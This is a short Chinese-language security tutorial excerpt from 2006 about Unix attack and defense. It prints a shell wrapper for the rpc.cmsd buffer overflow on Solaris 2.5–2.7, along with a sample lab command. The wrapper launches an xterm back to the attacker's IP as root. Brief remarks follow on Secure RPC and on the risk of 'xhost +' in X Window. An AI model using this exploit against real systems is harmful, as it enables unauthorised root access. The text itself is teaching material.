战术攻防思维撷粹(2)
2006-07-04 20:29:23 来源:WEB开发网#####cmsd.sh###########
#!/bin/sh
if [$# -lt 4]; then
echo "Rpc.cmsd buffer overflow for Solaris 2.5 & 2.6 7"
echo "If rpcinfo -p target_ip | grep 100068 = ture - you win!"
echo "Don't forget to xhost+ the target system"
echo " "
echo "Usage: $0 target_hostname target_ip < O/S version (1-7)> your_ip"
exit 1
fi
echo "Executing exploit..."
cmsd -h $1 -c "/usr/openwin/bin/xterm -display $4:0.0 &" $3 $2
#####cmsd.sh end##########
[Labmachine]#cmsd.sh {system_name} 192.168.1.11 2 192.168.1.103
rpc.cmsd漏洞是针对特定的操作系统而量身定制的,本例程中适合于Solaris2.5、2.6、2.7操作系统。溢出成功后,则回送攻击者一个xterm的shell命令,其权限是受害主机的root!这种典型应用的确让人吓了一跳。
RPC带来便利的同时也引入安全问题,因此现代的UNIX系统中引入了密钥方式的Secure RPC,这种认证机制的引入相信可以修补RPC不健全的机制。
**X window小试
专业的Unix管理员一般很排斥使用GUI界面方式来管理系统。但是对于初学者来说,使用图形管理界面能逐渐适应从“鼠标到键盘”的管理思维方式的转变。X window系统则提供了多个程序以图形方式显示的丰富特性。但由于X windows是基于网络机制设计的,一旦用户掌握X windows就可以捕获键盘击键、关闭窗口、启动各种恶意命令,这种无法无天的闹剧真是令人头痛。当然,可以xhost命令进行认证控制。但是有些管理员为求方便,使用xhost +命令,于是允许了未加认证的访问。
更多精彩
赞助商链接